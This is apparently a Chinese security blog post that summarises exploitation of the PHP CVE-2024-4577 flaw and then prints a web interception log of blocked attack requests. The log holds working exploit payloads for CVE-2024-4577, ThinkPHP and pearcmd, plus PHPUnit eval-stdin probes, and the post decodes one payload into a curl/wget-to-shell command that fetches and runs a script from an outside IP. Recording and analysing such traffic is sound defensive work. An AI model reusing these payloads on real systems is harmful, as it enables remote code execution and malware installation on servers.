【拦截日志】黑客积极利用PHP远程代码执行漏洞（CVE-2024-4577）

概要

2024年6月，一项被标记为CVE-2024-4577的PHP关键漏洞在公开披露后，迅速成为网络犯罪分子的主要攻击目标。Akamai安全情报响应团队（SIRT）观察到利用该漏洞的恶意活动激增，攻击者能够在易受攻击的PHP安装中执行远程代码。

主要内容

CVE-2024-4577漏洞影响PHP 8.1.29之前的版本、8.2.20之前的版本和8.3.8之前的版本，特别是在CGI模式下运行时。攻击者迅速武器化了这一漏洞，部署了多种恶意软件，包括Gh0st RAT、RedTail加密矿工、Muhstik恶意软件和XMRig加密矿工。

Gh0st RAT是最早被观察到利用该漏洞的恶意软件之一。该远程访问工具在漏洞披露后的一天内就被检测到。Gh0st RAT通过UPX打包，释放一个名为“Iqgqosc.exe”的可执行文件，枚举连接的驱动器和外设，并查询注册表。随后，它重命名为一个长且随机的文件名以避免检测，并与位于德国的命令和控制（C2）服务器通信。

RedTail加密矿工的攻击活动也被观察到。攻击者利用Unicode漏洞发送请求，执行一个wget请求以下载并执行一个shell脚本。该脚本托管在俄罗斯的一个IP地址上，旨在识别可写目录并下载有效载荷，将其重命名为“.redtail”。

Muhstik恶意软件也利用了CVE-2024-4577漏洞。一个shell脚本下载了一个名为“pty3”的ELF文件，表明这是Muhstik恶意软件，目标是物联网和Linux服务器进行加密挖矿和DDoS攻击。该恶意软件创建了诸如“/var/run/pty3”这样的目录，并与最近与其他Muhstik活动相关的C2域通信。

XMRig加密矿工的攻击活动使用PowerShell下载并执行一个脚本，从远程矿池部署XMRig。该脚本随后清理临时文件以混淆攻击，使检测更加困难。CVE-2024-4577漏洞的快速和广泛利用突显了立即修补受影响PHP安装的关键需求。未能及时更新系统的组织面临重大风险，包括数据泄露、未经授权的访问、系统妥协和潜在的勒索软件攻击。

拦截日志

[2024-10-17 04:39:17][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/hello.world", "requestMethod": "POST", "requestPOST": {"<?php shell_exec(base64_decode(\"WD0kKGN1cmwgaHR0cDovLzE1NC4yMTYuMTcuMzAvYXogfHwgd2dldCBodHRwOi8vMTU0LjIxNi4xNy4zMC9heiAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA": "\")); echo(md5(\"Hello CVE-2024-4577\")); ?>"}, "requestGET": {"\ufffdd allow_url_include=1 \ufffdd auto_prepend_file=php://input": ""}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:17][INFO][middlewares.py:70:process_response]：{"requestPath": "/hello.world", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:17][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:17][INFO][middlewares.py:70:process_response]：{"requestPath": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:17][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:17][INFO][middlewares.py:70:process_response]：{"requestPath": "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/vendor/phpunit/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/vendor/phpunit/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/phpunit/phpunit/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/phpunit/phpunit/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/phpunit/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/phpunit/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:18][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:18][INFO][middlewares.py:70:process_response]：{"requestPath": "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/lib/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/lib/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/lib/phpunit/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/lib/phpunit/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:19][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:19][INFO][middlewares.py:70:process_response]：{"requestPath": "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:20][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:20][INFO][middlewares.py:70:process_response]：{"requestPath": "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:21][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:21][INFO][middlewares.py:70:process_response]：{"requestPath": "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:21][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/index.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {"s": "/index/\\think\\app/invokefunction", "function": "call_user_func_array", "vars[0]": "md5", "vars[1][]": "Hello"}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:21][INFO][middlewares.py:70:process_response]：{"requestPath": "/index.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:21][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/public/index.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {"s": "/index/\\think\\app/invokefunction", "function": "call_user_func_array", "vars[0]": "md5", "vars[1][]": "Hello"}, "requestBody": "NOT JSON"}
[2024-10-17 04:39:21][INFO][middlewares.py:70:process_response]：{"requestPath": "/public/index.php", "responseContent": {"code": 201, "data": {}, "msg": "Authentication failed"}}
[2024-10-17 04:39:21][INFO][middlewares.py:37:process_request]：{"ipInfo": "117.186.238.82", "requestPath": "/index.php", "requestMethod": "GET", "requestPOST": {}, "requestGET": {"lang": "../../../../../../../../usr/local/lib/php/pearcmd", " config-create /": "", "/<?echo(md5(\"hi\"));?> /tmp/index1.php": ""}, "requestBody": "NOT JSON"}

内容解析

base64_decode(\"WD0kKGN1cmwgaHR0cDovLzE1NC4yMTYuMTcuMzAvYXogfHwgd2dldCBodHRwOi8vMTU0LjIxNi4xNy4zMC9heiAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA": "\"));

结果为

X=$(curl http://154.216.17.30/az || wget http://154.216.17.30/az -O-); echo "$X" | sh -s cve_2024_4577.selfrep